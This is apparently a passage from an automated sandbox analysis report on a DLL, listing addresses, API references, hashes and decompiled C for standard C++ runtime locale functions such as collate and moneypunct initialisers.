                          0x6e20fc23
                          0x00000000
                          0x6e20fc23
                          0x6e20fc21
                          0x6e20fb94
                          0x6e20fb94
                          0x6e20fb97
                          0x6e20fb9b
                          0x6e20fb9f
                          0x6e20fbac
                          0x6e20fbb4
                          0x6e20fbb6
                          0x00000000
                          0x6e20fbb6
                          0x6e20fb7d
                          0x6e20fb7d
                          0x00000000
                          0x6e20fb7d
                          0x6e20fb7b
                          0x6e20faee
                          0x6e20faee
                          0x6e20faf1
                          0x6e20faf5
                          0x6e20faf9
                          0x6e20fb06
                          0x6e20fb0e
                          0x6e20fb10
                          0x00000000
                          0x6e20fb10
                          0x6e20fad7
                          0x6e20fad7
                          0x00000000
                          0x6e20fad7
                          0x6e20fad5
                          0x6e20fa48
                          0x6e20fa48
                          0x6e20fa4b
                          0x6e20fa4f
                          0x6e20fa53
                          0x6e20fa60
                          0x6e20fa68
                          0x6e20fa6a
                          0x00000000
                          0x6e20fa6a
                          0x6e20fa31
                          0x6e20fa31
                          0x00000000
                          0x6e20fa31
                          0x6e20fa2f
                          0x6e20f9a2
                          0x6e20f9a2
                          0x6e20f9a5
                          0x6e20f9a9
                          0x6e20f9ad
                          0x6e20f9ba
                          0x6e20f9c2
                          0x6e20f9c4
                          0x00000000
                          0x6e20f9c4
                          0x6e20f98b
                          0x6e20f98b
                          0x00000000
                          0x6e20f98b
                          0x6e20f989
                          0x6e20f8fc
                          0x6e20f8fc
                          0x6e20f8ff
                          0x6e20f903
                          0x6e20f907
                          0x6e20f914
                          0x6e20f91c
                          0x6e20f91e
                          0x00000000
                          0x6e20f91e
                          0x6e20f8e5
                          0x6e20f8e5
                          0x00000000
                          0x6e20f8e5
                          0x6e20f8e3
                          0x6e20f856
                          0x6e20f856
                          0x6e20f859
                          0x6e20f85d
                          0x6e20f861
                          0x6e20f86e
                          0x6e20f876
                          0x6e20f878
                          0x00000000
                          0x6e20f878
                          0x6e20f83f
                          0x6e20f83f
                          0x00000000
                          0x6e20f83f
                          0x6e20f83d
                          0x6e20f7b0
                          0x6e20f7b0
                          0x6e20f7b3
                          0x6e20f7b7
                          0x6e20f7bb
                          0x6e20f7c8
                          0x6e20f7d0
                          0x6e20f7d2
                          0x00000000
                          0x6e20f7d2
                          0x6e20f799
                          0x6e20f799
                          0x00000000
                          0x6e20f799
                          0x6e20f797
                          0x6e20f70a
                          0x6e20f70a
                          0x6e20f70d
                          0x6e20f711
                          0x6e20f715
                          0x6e20f722
                          0x6e20f72a
                          0x6e20f72c
                          0x00000000
                          0x6e20f72c
                          0x6e20f6f3
                          0x6e20f6f3
                          0x00000000
                          0x6e20f6f3
                          0x6e20f6f1
                          0x6e20f664
                          0x6e20f664
                          0x6e20f667
                          0x6e20f66b
                          0x6e20f66f
                          0x6e20f67c
                          0x6e20f684
                          0x6e20f686
                          0x00000000
                          0x6e20f686
                          0x6e20f64d
                          0x6e20f64d
                          0x00000000
                          0x6e20f64d
                          0x6e20f64b
                          0x6e20f5be
                          0x6e20f5be
                          0x6e20f5c1
                          0x6e20f5c5
                          0x6e20f5c9
                          0x6e20f5d6
                          0x6e20f5de
                          0x6e20f5e0
                          0x00000000
                          0x6e20f5e0
                          0x6e20f5a7
                          0x6e20f5a7
                          0x00000000
                          0x6e20f5a7
                          0x6e20f5a5
                          0x6e20f518
                          0x6e20f518
                          0x6e20f51b
                          0x6e20f51f
                          0x6e20f523
                          0x6e20f530
                          0x6e20f538
                          0x6e20f53a
                          0x00000000
                          0x6e20f53a
                          0x6e20f501
                          0x6e20f501
                          0x00000000
                          0x6e20f501
                          0x6e20f4ff
                          0x6e20f472
                          0x6e20f472
                          0x6e20f475
                          0x6e20f479
                          0x6e20f47d
                          0x6e20f48a
                          0x6e20f492
                          0x6e20f494
                          0x00000000
                          0x6e20f494
                          0x6e20f45b
                          0x6e20f45b
                          0x00000000
                          0x6e20f45b
                          0x6e20f459
                          0x6e20f3cc
                          0x6e20f3cc
                          0x6e20f3cf
                          0x6e20f3d3
                          0x6e20f3d7
                          0x6e20f3e4
                          0x6e20f3ec
                          0x6e20f3ee
                          0x00000000
                          0x6e20f3ee
                          0x6e20f3b5
                          0x6e20f3b5
                          0x00000000
                          0x6e20f3b5
                          0x6e20f3b3
                          0x6e20f326
                          0x6e20f326
                          0x6e20f329
                          0x6e20f32d
                          0x6e20f331
                          0x6e20f33e
                          0x6e20f346
                          0x6e20f348
                          0x00000000
                          0x6e20f348
                          0x6e20f30f
                          0x6e20f30f
                          0x00000000
                          0x6e20f30f
                          0x6e20f30d
                          0x6e20f280
                          0x6e20f280
                          0x6e20f283
                          0x6e20f287
                          0x6e20f28b
                          0x6e20f298
                          0x6e20f2a0
                          0x6e20f2a2
                          0x00000000
                          0x6e20f2a2
                          0x6e20f269
                          0x6e20f269
                          0x00000000
                          0x6e20f269
                          0x6e20f267
                          0x6e20f1da
                          0x6e20f1da
                          0x6e20f1dd
                          0x6e20f1e1
                          0x6e20f1e5
                          0x6e20f1f2
                          0x6e20f1fa
                          0x6e20f1fc
                          0x00000000
                          0x6e20f1fc
                          0x6e20f1c3
                          0x6e20f1c3
                          0x00000000
                          0x6e20f1c3
                          0x6e20f1c1
                          0x6e20f134
                          0x6e20f134
                          0x6e20f137
                          0x6e20f13b
                          0x6e20f13f
                          0x6e20f14c
                          0x6e20f154
                          0x6e20f156
                          0x00000000
                          0x6e20f156
                          0x6e20f11d
                          0x6e20f11d
                          0x00000000
                          0x6e20f11d
                          0x6e20f11b
                          0x6e20f08e
                          0x6e20f08e
                          0x6e20f091
                          0x6e20f095
                          0x6e20f099
                          0x6e20f0a6
                          0x6e20f0ae
                          0x6e20f0b0
                          0x00000000
                          0x6e20f0b0
                          0x6e20f077
                          0x6e20f077
                          0x00000000
                          0x6e20f077
                          0x6e20f075
                          0x6e20efe8
                          0x6e20efe8
                          0x6e20efeb
                          0x6e20efef
                          0x6e20eff3
                          0x6e20f000
                          0x6e20f008
                          0x6e20f00a
                          0x00000000
                          0x6e20f00a
                          0x6e20efd1
                          0x6e20efd1
                          0x00000000
                          0x6e20efd1
                          0x6e20efcf

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20EF98
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20EFA2
                          • int.LIBCPMT ref: 6E20EFB9
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • collate.LIBCPMT ref: 6E20EFDC
                          • std::_Facet_Register.LIBCPMT ref: 6E20EFF3
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F013
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20F031
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcollate
                          • String ID:
                          • API String ID: 2363045490-0
                          • Opcode ID: 9d4ec4f87350eb97de8be75f7767e3c165ab8d60c3e96bdd77b880eb4a02d8c0
                          • Instruction ID: 5c9b8f76120b1df9aeff51c5084e6e907daec447d121e33e8a8055deb2c3d2f3
                          • Opcode Fuzzy Hash: 9d4ec4f87350eb97de8be75f7767e3c165ab8d60c3e96bdd77b880eb4a02d8c0
                          • Instruction Fuzzy Hash: BA11E37591051D8BCF00DBE0C894AEEB77BAF44715F140909E510AB2D0DFB4AA40C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E21BA8A, Relevance: 10.6, APIs: 7, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 74%
                          			E6E21BA8A(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t55;
				signed int _t56;
				void* _t68;
				void* _t81;
				signed int _t131;
				signed int _t144;
				signed int _t145;
				signed int _t147;
				signed int _t148;
				signed int _t149;
				signed int _t150;
				void* _t154;

				_t141 = __edx;
				_t110 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t154 - 0x14, 0);
				_t147 =  *0x6e2c6e38; // 0x0
				 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
				 *(_t154 - 0x10) = _t147;
				_t55 = E6E1E161C(0x6e2c6e18);
				_t113 =  *((intOrPtr*)(_t154 + 8));
				_t56 = E6E1E171B( *((intOrPtr*)(_t154 + 8)), _t55);
				_t143 = _t56;
				if(_t56 != 0) {
					L5:
					E6E2066BA(_t154 - 0x14);
					return E6E220075(_t143);
				} else {
					if(_t147 == 0) {
						_push( *((intOrPtr*)(_t154 + 8)));
						_push(_t154 - 0x10);
						__eflags = E6E21C1A4(__ebx, _t113, __edx, _t143, _t147) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t154 - 0x20);
							E6E223D74(_t154 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t143, _t147, 0x14);
							E6E206653(_t154 - 0x14, 0);
							_t148 =  *0x6e2c6e40; // 0x0
							 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
							 *(_t154 - 0x10) = _t148;
							_t68 = E6E1E161C(0x6e2c6e20);
							_t120 =  *((intOrPtr*)(_t154 + 8));
							_t144 = E6E1E171B( *((intOrPtr*)(_t154 + 8)), _t68);
							__eflags = _t144;
							if(_t144 != 0) {
								L12:
								E6E2066BA(_t154 - 0x14);
								return E6E220075(_t144);
							} else {
								__eflags = _t148;
								if(_t148 == 0) {
									_push( *((intOrPtr*)(_t154 + 8)));
									_push(_t154 - 0x10);
									__eflags = E6E21C229(_t110, _t120, __edx, _t144, _t148) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t154 - 0x20);
										E6E223D74(_t154 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t110, _t144, _t148, 0x14);
										E6E206653(_t154 - 0x14, 0);
										_t149 =  *0x6e2c6e44; // 0x0
										 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
										 *(_t154 - 0x10) = _t149;
										_t81 = E6E1E161C(0x6e2c6e24);
										_t127 =  *((intOrPtr*)(_t154 + 8));
										_t145 = E6E1E171B( *((intOrPtr*)(_t154 + 8)), _t81);
										__eflags = _t145;
										if(_t145 != 0) {
											L19:
											E6E2066BA(_t154 - 0x14);
											return E6E220075(_t145);
										} else {
											__eflags = _t149;
											if(_t149 == 0) {
												_push( *((intOrPtr*)(_t154 + 8)));
												_push(_t154 - 0x10);
												__eflags = E6E21C295(_t110, _t127, __edx, _t145, _t149) - 0xffffffff;
												if(__eflags == 0) {
													_t131 = _t154 - 0x20;
													E6E1E1438(_t131);
													E6E223D74(_t154 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e26851f, _t110, _t145, _t149, 4);
													_t150 = _t131;
													 *(_t154 - 0x10) = _t150;
													 *((intOrPtr*)(_t150 + 4)) =  *((intOrPtr*)(_t154 + 0xc));
													_push( *((intOrPtr*)(_t154 + 0x14)));
													_t49 = _t154 - 4;
													 *_t49 =  *(_t154 - 4) & 0x00000000;
													__eflags =  *_t49;
													 *_t150 = 0x6e26c414;
													 *((char*)(_t150 + 0x28)) =  *((intOrPtr*)(_t154 + 0x10));
													E6E21D028(_t110, _t131, _t141, _t145, _t150,  *_t49);
													return E6E220075(_t150,  *((intOrPtr*)(_t154 + 8)));
												} else {
													_t145 =  *(_t154 - 0x10);
													 *(_t154 - 0x10) = _t145;
													 *(_t154 - 4) = 1;
													E6E206FD3(__eflags, _t145);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t145 + 4))))();
													 *0x6e2c6e44 = _t145;
													goto L19;
												}
											} else {
												_t145 = _t149;
												goto L19;
											}
										}
									} else {
										_t144 =  *(_t154 - 0x10);
										 *(_t154 - 0x10) = _t144;
										 *(_t154 - 4) = 1;
										E6E206FD3(__eflags, _t144);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t144 + 4))))();
										 *0x6e2c6e40 = _t144;
										goto L12;
									}
								} else {
									_t144 = _t148;
									goto L12;
								}
							}
						} else {
							_t143 =  *(_t154 - 0x10);
							 *(_t154 - 0x10) = _t143;
							 *(_t154 - 4) = 1;
							E6E206FD3(__eflags, _t143);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t143 + 4))))();
							 *0x6e2c6e38 = _t143;
							goto L5;
						}
					} else {
						_t143 = _t147;
						goto L5;
					}
				}
			}















                          0x6e21ba8a
                          0x6e21ba8a
                          0x6e21ba91
                          0x6e21ba9b
                          0x6e21baa0
                          0x6e21baab
                          0x6e21baaf
                          0x6e21bab2
                          0x6e21bab7
                          0x6e21babb
                          0x6e21bac0
                          0x6e21bac4
                          0x6e21bb09
                          0x6e21bb0c
                          0x6e21bb18
                          0x6e21bac6
                          0x6e21bac8
                          0x6e21bace
                          0x6e21bad4
                          0x6e21badc
                          0x6e21badf
                          0x6e21bb1c
                          0x6e21bb2a
                          0x6e21bb2f
                          0x6e21bb37
                          0x6e21bb41
                          0x6e21bb46
                          0x6e21bb51
                          0x6e21bb55
                          0x6e21bb58
                          0x6e21bb5d
                          0x6e21bb66
                          0x6e21bb68
                          0x6e21bb6a
                          0x6e21bbaf
                          0x6e21bbb2
                          0x6e21bbbe
                          0x6e21bb6c
                          0x6e21bb6c
                          0x6e21bb6e
                          0x6e21bb74
                          0x6e21bb7a
                          0x6e21bb82
                          0x6e21bb85
                          0x6e21bbc2
                          0x6e21bbd0
                          0x6e21bbd5
                          0x6e21bbdd
                          0x6e21bbe7
                          0x6e21bbec
                          0x6e21bbf7
                          0x6e21bbfb
                          0x6e21bbfe
                          0x6e21bc03
                          0x6e21bc0c
                          0x6e21bc0e
                          0x6e21bc10
                          0x6e21bc55
                          0x6e21bc58
                          0x6e21bc64
                          0x6e21bc12
                          0x6e21bc12
                          0x6e21bc14
                          0x6e21bc1a
                          0x6e21bc20
                          0x6e21bc28
                          0x6e21bc2b
                          0x6e21bc65
                          0x6e21bc68
                          0x6e21bc76
                          0x6e21bc7b
                          0x6e21bc83
                          0x6e21bc88
                          0x6e21bc8a
                          0x6e21bc90
                          0x6e21bc93
                          0x6e21bc9c
                          0x6e21bc9c
                          0x6e21bc9c
                          0x6e21bca0
                          0x6e21bca6
                          0x6e21bca9
                          0x6e21bcb5
                          0x6e21bc2d
                          0x6e21bc2d
                          0x6e21bc30
                          0x6e21bc34
                          0x6e21bc38
                          0x6e21bc45
                          0x6e21bc4d
                          0x6e21bc4f
                          0x00000000
                          0x6e21bc4f
                          0x6e21bc16
                          0x6e21bc16
                          0x00000000
                          0x6e21bc16
                          0x6e21bc14
                          0x6e21bb87
                          0x6e21bb87
                          0x6e21bb8a
                          0x6e21bb8e
                          0x6e21bb92
                          0x6e21bb9f
                          0x6e21bba7
                          0x6e21bba9
                          0x00000000
                          0x6e21bba9
                          0x6e21bb70
                          0x6e21bb70
                          0x00000000
                          0x6e21bb70
                          0x6e21bb6e
                          0x6e21bae1
                          0x6e21bae1
                          0x6e21bae4
                          0x6e21bae8
                          0x6e21baec
                          0x6e21baf9
                          0x6e21bb01
                          0x6e21bb03
                          0x00000000
                          0x6e21bb03
                          0x6e21baca
                          0x6e21baca
                          0x00000000
                          0x6e21baca
                          0x6e21bac8

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E21BA91
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E21BA9B
                          • int.LIBCPMT ref: 6E21BAB2
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • moneypunct.LIBCPMT ref: 6E21BAD5
                          • std::_Facet_Register.LIBCPMT ref: 6E21BAEC
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E21BB0C
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E21BB2A
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
                          • String ID:
                          • API String ID: 113178234-0
                          • Opcode ID: bce9ecf732a7b4b5fc076547dad1aecc5c1a3bf6f81be0d14a4e478a59f42148
                          • Instruction ID: 734de158d0fa54177c58d4227b11f51af845ccd0e6bbc089bfe5059c94ce5df3
                          • Opcode Fuzzy Hash: bce9ecf732a7b4b5fc076547dad1aecc5c1a3bf6f81be0d14a4e478a59f42148
                          • Instruction Fuzzy Hash: 1911E37A90451ECBCF04DBE4C894AFDB7BBAF45B14F180919E5116B390DBB49A40C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E21B9E4, Relevance: 10.6, APIs: 7, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 73%
                          			E6E21B9E4(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t69;
				signed int _t70;
				void* _t82;
				void* _t95;
				void* _t108;
				signed int _t169;
				signed int _t185;
				signed int _t186;
				signed int _t187;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				signed int _t193;
				void* _t198;

				_t182 = __edx;
				_t141 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t198 - 0x14, 0);
				_t189 =  *0x6e2c6e3c; // 0x0
				 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
				 *(_t198 - 0x10) = _t189;
				_t69 = E6E1E161C(0x6e2c6e1c);
				_t144 =  *((intOrPtr*)(_t198 + 8));
				_t70 = E6E1E171B( *((intOrPtr*)(_t198 + 8)), _t69);
				_t184 = _t70;
				if(_t70 != 0) {
					L5:
					E6E2066BA(_t198 - 0x14);
					return E6E220075(_t184);
				} else {
					if(_t189 == 0) {
						_push( *((intOrPtr*)(_t198 + 8)));
						_push(_t198 - 0x10);
						__eflags = E6E21C120(__ebx, _t144, __edx, _t184, _t189) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t198 - 0x20);
							E6E223D74(_t198 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t184, _t189, 0x14);
							E6E206653(_t198 - 0x14, 0);
							_t190 =  *0x6e2c6e38; // 0x0
							 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
							 *(_t198 - 0x10) = _t190;
							_t82 = E6E1E161C(0x6e2c6e18);
							_t151 =  *((intOrPtr*)(_t198 + 8));
							_t185 = E6E1E171B( *((intOrPtr*)(_t198 + 8)), _t82);
							__eflags = _t185;
							if(_t185 != 0) {
								L12:
								E6E2066BA(_t198 - 0x14);
								return E6E220075(_t185);
							} else {
								__eflags = _t190;
								if(_t190 == 0) {
									_push( *((intOrPtr*)(_t198 + 8)));
									_push(_t198 - 0x10);
									__eflags = E6E21C1A4(_t141, _t151, __edx, _t185, _t190) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t198 - 0x20);
										E6E223D74(_t198 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t141, _t185, _t190, 0x14);
										E6E206653(_t198 - 0x14, 0);
										_t191 =  *0x6e2c6e40; // 0x0
										 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
										 *(_t198 - 0x10) = _t191;
										_t95 = E6E1E161C(0x6e2c6e20);
										_t158 =  *((intOrPtr*)(_t198 + 8));
										_t186 = E6E1E171B( *((intOrPtr*)(_t198 + 8)), _t95);
										__eflags = _t186;
										if(_t186 != 0) {
											L19:
											E6E2066BA(_t198 - 0x14);
											return E6E220075(_t186);
										} else {
											__eflags = _t191;
											if(_t191 == 0) {
												_push( *((intOrPtr*)(_t198 + 8)));
												_push(_t198 - 0x10);
												__eflags = E6E21C229(_t141, _t158, __edx, _t186, _t191) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t198 - 0x20);
													E6E223D74(_t198 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t141, _t186, _t191, 0x14);
													E6E206653(_t198 - 0x14, 0);
													_t192 =  *0x6e2c6e44; // 0x0
													 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
													 *(_t198 - 0x10) = _t192;
													_t108 = E6E1E161C(0x6e2c6e24);
													_t165 =  *((intOrPtr*)(_t198 + 8));
													_t187 = E6E1E171B( *((intOrPtr*)(_t198 + 8)), _t108);
													__eflags = _t187;
													if(_t187 != 0) {
														L26:
														E6E2066BA(_t198 - 0x14);
														return E6E220075(_t187);
													} else {
														__eflags = _t192;
														if(_t192 == 0) {
															_push( *((intOrPtr*)(_t198 + 8)));
															_push(_t198 - 0x10);
															__eflags = E6E21C295(_t141, _t165, _t182, _t187, _t192) - 0xffffffff;
															if(__eflags == 0) {
																_t169 = _t198 - 0x20;
																E6E1E1438(_t169);
																E6E223D74(_t198 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e26851f, _t141, _t187, _t192, 4);
																_t193 = _t169;
																 *(_t198 - 0x10) = _t193;
																 *((intOrPtr*)(_t193 + 4)) =  *((intOrPtr*)(_t198 + 0xc));
																_push( *((intOrPtr*)(_t198 + 0x14)));
																_t63 = _t198 - 4;
																 *_t63 =  *(_t198 - 4) & 0x00000000;
																__eflags =  *_t63;
																 *_t193 = 0x6e26c414;
																 *((char*)(_t193 + 0x28)) =  *((intOrPtr*)(_t198 + 0x10));
																E6E21D028(_t141, _t169, _t182, _t187, _t193,  *_t63);
																return E6E220075(_t193,  *((intOrPtr*)(_t198 + 8)));
															} else {
																_t187 =  *(_t198 - 0x10);
																 *(_t198 - 0x10) = _t187;
																 *(_t198 - 4) = 1;
																E6E206FD3(__eflags, _t187);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t187 + 4))))();
																 *0x6e2c6e44 = _t187;
																goto L26;
															}
														} else {
															_t187 = _t192;
															goto L26;
														}
													}
												} else {
													_t186 =  *(_t198 - 0x10);
													 *(_t198 - 0x10) = _t186;
													 *(_t198 - 4) = 1;
													E6E206FD3(__eflags, _t186);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t186 + 4))))();
													 *0x6e2c6e40 = _t186;
													goto L19;
												}
											} else {
												_t186 = _t191;
												goto L19;
											}
										}
									} else {
										_t185 =  *(_t198 - 0x10);
										 *(_t198 - 0x10) = _t185;
										 *(_t198 - 4) = 1;
										E6E206FD3(__eflags, _t185);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t185 + 4))))();
										 *0x6e2c6e38 = _t185;
										goto L12;
									}
								} else {
									_t185 = _t190;
									goto L12;
								}
							}
						} else {
							_t184 =  *(_t198 - 0x10);
							 *(_t198 - 0x10) = _t184;
							 *(_t198 - 4) = 1;
							E6E206FD3(__eflags, _t184);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t184 + 4))))();
							 *0x6e2c6e3c = _t184;
							goto L5;
						}
					} else {
						_t184 = _t189;
						goto L5;
					}
				}
			}


















                          0x6e21b9e4
                          0x6e21b9e4
                          0x6e21b9eb
                          0x6e21b9f5
                          0x6e21b9fa
                          0x6e21ba05
                          0x6e21ba09
                          0x6e21ba0c
                          0x6e21ba11
                          0x6e21ba15
                          0x6e21ba1a
                          0x6e21ba1e
                          0x6e21ba63
                          0x6e21ba66
                          0x6e21ba72
                          0x6e21ba20
                          0x6e21ba22
                          0x6e21ba28
                          0x6e21ba2e
                          0x6e21ba36
                          0x6e21ba39
                          0x6e21ba76
                          0x6e21ba84
                          0x6e21ba89
                          0x6e21ba91
                          0x6e21ba9b
                          0x6e21baa0
                          0x6e21baab
                          0x6e21baaf
                          0x6e21bab2
                          0x6e21bab7
                          0x6e21bac0
                          0x6e21bac2
                          0x6e21bac4
                          0x6e21bb09
                          0x6e21bb0c
                          0x6e21bb18
                          0x6e21bac6
                          0x6e21bac6
                          0x6e21bac8
                          0x6e21bace
                          0x6e21bad4
                          0x6e21badc
                          0x6e21badf
                          0x6e21bb1c
                          0x6e21bb2a
                          0x6e21bb2f
                          0x6e21bb37
                          0x6e21bb41
                          0x6e21bb46
                          0x6e21bb51
                          0x6e21bb55
                          0x6e21bb58
                          0x6e21bb5d
                          0x6e21bb66
                          0x6e21bb68
                          0x6e21bb6a
                          0x6e21bbaf
                          0x6e21bbb2
                          0x6e21bbbe
                          0x6e21bb6c
                          0x6e21bb6c
                          0x6e21bb6e
                          0x6e21bb74
                          0x6e21bb7a
                          0x6e21bb82
                          0x6e21bb85
                          0x6e21bbc2
                          0x6e21bbd0
                          0x6e21bbd5
                          0x6e21bbdd
                          0x6e21bbe7
                          0x6e21bbec
                          0x6e21bbf7
                          0x6e21bbfb
                          0x6e21bbfe
                          0x6e21bc03
                          0x6e21bc0c
                          0x6e21bc0e
                          0x6e21bc10
                          0x6e21bc55
                          0x6e21bc58
                          0x6e21bc64
                          0x6e21bc12
                          0x6e21bc12
                          0x6e21bc14
                          0x6e21bc1a
                          0x6e21bc20
                          0x6e21bc28
                          0x6e21bc2b
                          0x6e21bc65
                          0x6e21bc68
                          0x6e21bc76
                          0x6e21bc7b
                          0x6e21bc83
                          0x6e21bc88
                          0x6e21bc8a
                          0x6e21bc90
                          0x6e21bc93
                          0x6e21bc9c
                          0x6e21bc9c
                          0x6e21bc9c
                          0x6e21bca0
                          0x6e21bca6
                          0x6e21bca9
                          0x6e21bcb5
                          0x6e21bc2d
                          0x6e21bc2d
                          0x6e21bc30
                          0x6e21bc34
                          0x6e21bc38
                          0x6e21bc45
                          0x6e21bc4d
                          0x6e21bc4f
                          0x00000000
                          0x6e21bc4f
                          0x6e21bc16
                          0x6e21bc16
                          0x00000000
                          0x6e21bc16
                          0x6e21bc14
                          0x6e21bb87
                          0x6e21bb87
                          0x6e21bb8a
                          0x6e21bb8e
                          0x6e21bb92
                          0x6e21bb9f
                          0x6e21bba7
                          0x6e21bba9
                          0x00000000
                          0x6e21bba9
                          0x6e21bb70
                          0x6e21bb70
                          0x00000000
                          0x6e21bb70
                          0x6e21bb6e
                          0x6e21bae1
                          0x6e21bae1
                          0x6e21bae4
                          0x6e21bae8
                          0x6e21baec
                          0x6e21baf9
                          0x6e21bb01
                          0x6e21bb03
                          0x00000000
                          0x6e21bb03
                          0x6e21baca
                          0x6e21baca
                          0x00000000
                          0x6e21baca
                          0x6e21bac8
                          0x6e21ba3b
                          0x6e21ba3b
                          0x6e21ba3e
                          0x6e21ba42
                          0x6e21ba46
                          0x6e21ba53
                          0x6e21ba5b
                          0x6e21ba5d
                          0x00000000
                          0x6e21ba5d
                          0x6e21ba24
                          0x6e21ba24
                          0x00000000
                          0x6e21ba24
                          0x6e21ba22

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E21B9EB
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E21B9F5
                          • int.LIBCPMT ref: 6E21BA0C
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • moneypunct.LIBCPMT ref: 6E21BA2F
                          • std::_Facet_Register.LIBCPMT ref: 6E21BA46
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E21BA66
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E21BA84
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
                          • String ID:
